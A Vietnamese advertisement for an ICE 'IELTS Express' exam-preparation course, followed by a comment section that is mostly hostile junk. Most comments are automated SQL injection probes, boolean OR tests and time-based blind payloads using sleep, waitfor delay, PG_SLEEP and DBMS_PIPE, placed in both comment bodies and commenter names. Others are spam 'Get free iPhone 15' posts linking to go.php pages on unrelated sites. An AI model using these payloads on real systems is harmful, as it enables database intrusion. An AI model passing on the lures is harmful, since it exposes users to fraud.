Nội dung khóa học

KHÓA HỌC IELTS EXPRESS

TĂNG 0,5 - 1 BAND ĐIỂM IELTS CHỈ 5 TUẦN 

- Bạn mong muốn tăng band điểm trong thời gian NGẮN NHẤT.

- Bạn cần IELTS để có thể xét tuyển vào trường Đại học, để tìm kiếm cơ hội việc làm tốt hơn?

- Bạn muốn tăng cơ hội tìm kiếm học bổng giá trị trong nước và nước ngoài?

KHÓA HỌC IELTS EXPRESS LÀ DÀNH CHO BẠN

✅ Khóa học được thiết kế riêng phù hợp cho những bạn dự định thi IELTS tháng 5, 6

✅ Được giảng dạy bởi giảng viên chuyên gia luyện thi Ielts

✅ Chữa bộ đề thi mới nhất 2023

✅ Chữa bộ đề dự đoán cho kỹ năng Speaking

✅ Tập trung chữa lỗi cho 2 kĩ năng Viết – Nói

✅ Củng cố kĩ năng làm bài cho phần Nghe – Đọc

NHANH TAY ĐĂNG KÝ NGAY ĐỂ HOÀN THÀNH MỤC TIÊU CHINH PHỤC IELTS TRONG NĂM 2023 CÙNG ICE NÀO!

-------------------------------------------------------------------

HỆ THỐNG ANH NGỮ QUỐC TẾ ICE IELTS

- Contact liên hệ: 083 255 6969 | 1900 633 351 | 02485 88 83 83

- Đăng ký thi thử: https://bit.ly/thithuieltsice

- Đăng ký học thử: https://bit.ly/hocthuieltsice

- Đơn vị ủy quyền chính thức bài thi IELTS trên máy tính của IDP tại Việt Nam.

- Đào tạo bài bản lộ trình IELTS từ 0 - 8.5

- Khung chương trình đào tạo được thiết kế và chuyển giao bản quyền bởi hội đồng giám khảo IELTS của Đại học Cambridge.

- Đội ngũ giảng viên chuyên gia nhiều kinh nghiệm trong giảng dạy và đào tạo IELTS

- Phương pháp giảng dạy xung kích, tương tác 2 chiều: rèn luyện kỹ năng phản xạ ngôn ngữ nhanh, phát triển tư duy cho học viên.

- Lộ trình học được cá nhân hóa, được lấp đầy lỗ hổng kiến thức và tự tin phát triển thế mạnh.

- Cam kết đầu ra bằng hợp đồng đào tạo.

Bình luận “KHÓA HỌC IELTS EXPRESS

 1. 🎁 Get free iPhone 15: http://gitgroup.ac.in/uploads/go.php 🎁 hs=a97f0e004e4f333e3f51e86de4252e78* viết:
  sb29fp
  1. MmzHrrdb viết:
   nczp5PiU
  2. MmzHrrdb viết:
   -1 OR 2+414-414-1=0+0+0+1 --
  3. MmzHrrdb viết:
   -1 OR 2+504-504-1=0+0+0+1
  4. MmzHrrdb viết:
   -1' OR 2+475-475-1=0+0+0+1 --
  5. MmzHrrdb viết:
   -1' OR 2+354-354-1=0+0+0+1 or 'B4KNdwrm'='
  6. MmzHrrdb viết:
   -1" OR 2+12-12-1=0+0+0+1 --
  7. MmzHrrdb viết:
   if(now()=sysdate(),sleep(15),0)
  8. MmzHrrdb viết:
   0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  9. MmzHrrdb viết:
   0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  10. MmzHrrdb viết:
   (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  11. MmzHrrdb viết:
   -1; waitfor delay '0:0:15' --
  12. MmzHrrdb viết:
   -1); waitfor delay '0:0:15' --
  13. MmzHrrdb viết:
   1 waitfor delay '0:0:15' --
  14. MmzHrrdb viết:
   GnVtrv6d'; waitfor delay '0:0:15' --
  15. MmzHrrdb viết:
   -5 OR 926=(SELECT 926 FROM PG_SLEEP(15))--
  16. MmzHrrdb viết:
   -5) OR 648=(SELECT 648 FROM PG_SLEEP(15))--
  17. MmzHrrdb viết:
   -1)) OR 904=(SELECT 904 FROM PG_SLEEP(15))--
  18. MmzHrrdb viết:
   EpvLrjnV' OR 222=(SELECT 222 FROM PG_SLEEP(15))--
  19. MmzHrrdb viết:
   K45PenSK') OR 567=(SELECT 567 FROM PG_SLEEP(15))--
  20. MmzHrrdb viết:
   GFY45Eqt')) OR 879=(SELECT 879 FROM PG_SLEEP(15))--
  21. MmzHrrdb viết:
   555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  22. MmzHrrdb viết:
   555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  23. MmzHrrdb viết:
   @@xmy4O
  24. -1 OR 2+537-537-1=0+0+0+1 -- viết:
   555
  25. -1 OR 2+966-966-1=0+0+0+1 viết:
   555
  26. -1' OR 2+40-40-1=0+0+0+1 -- viết:
   555
  27. -1' OR 2+716-716-1=0+0+0+1 or 'CqIzRx13'=' viết:
   555
  28. -1" OR 2+847-847-1=0+0+0+1 -- viết:
   555
  29. if(now()=sysdate(),sleep(15),0) viết:
   555
  30. 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z viết:
   555
  31. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z viết:
   555
  32. (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ viết:
   555
  33. 1 waitfor delay '0:0:15' -- viết:
   555
  34. SW6lFb8o'; waitfor delay '0:0:15' -- viết:
   555
  35. LA25NgYo' OR 202=(SELECT 202 FROM PG_SLEEP(15))-- viết:
   555
  36. WL5y5QX4') OR 562=(SELECT 562 FROM PG_SLEEP(15))-- viết:
   555
  37. 5IqaKJnl')) OR 704=(SELECT 704 FROM PG_SLEEP(15))-- viết:
   555
  38. MmzHrrdb'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' viết:
   555
 2. 🎁 Get free iPhone 15: https://www.estrichbau-lampe.de/files/go.php 🎁 hs=89347d78eb4daf4a23fa4aafdc6e08bc* viết:
  lvdaj2
  1. 🎁 Get free iPhone 15: http://lover-dating.com/uploads/go.php 🎁 hs=a97f0e004e4f333e3f51e86de4252e78* viết:
   ubtdn8
  2. MmzHrrdb viết:
   yACEgk9M
  3. MmzHrrdb viết:
   -1 OR 2+13-13-1=0+0+0+1 --
  4. MmzHrrdb viết:
   -1 OR 2+411-411-1=0+0+0+1
  5. MmzHrrdb viết:
   -1' OR 2+885-885-1=0+0+0+1 --
  6. MmzHrrdb viết:
   -1' OR 2+902-902-1=0+0+0+1 or '0O6B2W8O'='
  7. MmzHrrdb viết:
   -1" OR 2+704-704-1=0+0+0+1 --
  8. MmzHrrdb viết:
   if(now()=sysdate(),sleep(15),0)
  9. MmzHrrdb viết:
   0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  10. MmzHrrdb viết:
   0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  11. MmzHrrdb viết:
   (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  12. MmzHrrdb viết:
   -1; waitfor delay '0:0:15' --
  13. MmzHrrdb viết:
   -1); waitfor delay '0:0:15' --
  14. MmzHrrdb viết:
   1 waitfor delay '0:0:15' --
  15. MmzHrrdb viết:
   zJVNjzEH'; waitfor delay '0:0:15' --
  16. MmzHrrdb viết:
   -5 OR 347=(SELECT 347 FROM PG_SLEEP(15))--
  17. MmzHrrdb viết:
   -5) OR 442=(SELECT 442 FROM PG_SLEEP(15))--
  18. MmzHrrdb viết:
   -1)) OR 224=(SELECT 224 FROM PG_SLEEP(15))--
  19. MmzHrrdb viết:
   wfqkNlpm' OR 360=(SELECT 360 FROM PG_SLEEP(15))--
  20. MmzHrrdb viết:
   Sw3uoXZC') OR 576=(SELECT 576 FROM PG_SLEEP(15))--
  21. MmzHrrdb viết:
   gvbehOvW')) OR 955=(SELECT 955 FROM PG_SLEEP(15))--
  22. MmzHrrdb viết:
   555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  23. MmzHrrdb viết:
   555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  24. MmzHrrdb viết:
   @@4k6cY
  25. -1 OR 2+134-134-1=0+0+0+1 -- viết:
   555
  26. -1 OR 2+579-579-1=0+0+0+1 viết:
   555
  27. -1' OR 2+605-605-1=0+0+0+1 -- viết:
   555
  28. -1' OR 2+893-893-1=0+0+0+1 or 'JJk6xjn8'=' viết:
   555
  29. -1" OR 2+228-228-1=0+0+0+1 -- viết:
   555
  30. if(now()=sysdate(),sleep(15),0) viết:
   555
  31. 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z viết:
   555
  32. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z viết:
   555
  33. (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ viết:
   555
  34. 1 waitfor delay '0:0:15' -- viết:
   555
  35. NHHSPN9b'; waitfor delay '0:0:15' -- viết:
   555
  36. hQn44mxT' OR 207=(SELECT 207 FROM PG_SLEEP(15))-- viết:
   555
  37. zR7nJC53') OR 298=(SELECT 298 FROM PG_SLEEP(15))-- viết:
   555
  38. BeqjPGab')) OR 403=(SELECT 403 FROM PG_SLEEP(15))-- viết:
   555
  39. MmzHrrdb'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' viết:
   555
 3. 🌍 Hello World! https://national-team.top/go/hezwgobsmq5dinbw?hs=a97f0e004e4f333e3f51e86de4252e78 🌍 viết:
  kju2x9
  1. 🎁 Get free iPhone 15: http://platinumhldg.com/uploads/go.php 🎁 hs=89347d78eb4daf4a23fa4aafdc6e08bc* viết:
   cc9k73
  2. 🎁 Get free iPhone 15: https://cncdost.com/uploads/go.php 🎁 hs=a97f0e004e4f333e3f51e86de4252e78* viết:
   x3386d
  3. 🎁 Get free iPhone 15: http://moovendharinstitute.com/upload/go.php 🎁 hs=a97f0e004e4f333e3f51e86de4252e78* viết:
   v2hxy7
  4. MmzHrrdb viết:
   mAzy1sfE